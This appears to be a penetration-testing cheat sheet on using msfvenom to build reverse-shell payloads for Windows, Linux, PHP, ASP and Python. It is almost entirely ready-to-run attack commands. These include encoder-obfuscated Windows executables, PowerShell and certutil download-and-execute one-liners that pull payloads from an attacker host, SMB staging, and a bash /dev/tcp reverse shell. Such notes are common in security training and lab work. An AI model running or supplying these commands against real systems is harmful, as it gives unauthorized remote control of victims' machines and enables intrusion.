2.3 KiB
2.3 KiB
msfvenom Usage
msfvenom -p <payload> <options>
- syntax
<OS>/<arch>/<payload>
* stageless
```
linux/x86/shell_reverse_tcp
```
* staged
```
linux/x86/shell/reverse_tcp
```
Windows
x64 Reverse Shell in exe format
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
x86 shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encode x86/shikata_ga_nai LHOST=10.9.7.123 LPORT=4446 -f exe -o shell.exe
Getting the shell on target
- on attack machine, with shell.exe in cwd
python -m http.server
- on target machine execute this
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
Start-Process "shell.exe"
or
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
or
powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
or on cmd.exe
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe
- Using SMB On attacker
sudo python impacket/examples/smbserver.py dir .
on target
copy \\<attacker-IP>\dir\shell.exe C:\shell.exe
Unix
netcat reverse
msfvenom -p cmd/unix/reverse_netcat LHOST=<listen-ip> LPORT=<liste-port> R
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=<Port> -f elf -o shell.elf
- Alternatively, not msfvenom
bash -c "bash -i >& /dev/tcp/<listen-ip>/<listen-port> 0>&1"
Include into Python Exploit as hex
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4444 EXITFUNC=thread -b "\x00" -f py
PHP
msfvenom -p php/reverse_shell LHOST=<attacker-IP> lPORT=4444 -f raw > reverse_shell.php
- Enclose raw file inside
<?php ... ?>tags
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f asp -o rev_shell.asp
Python
msfvenom -p cmd/unix/reverse_python LHOST=<attacker-IP> LPORT=<attacker-Port> -f python -o reverse_shell.python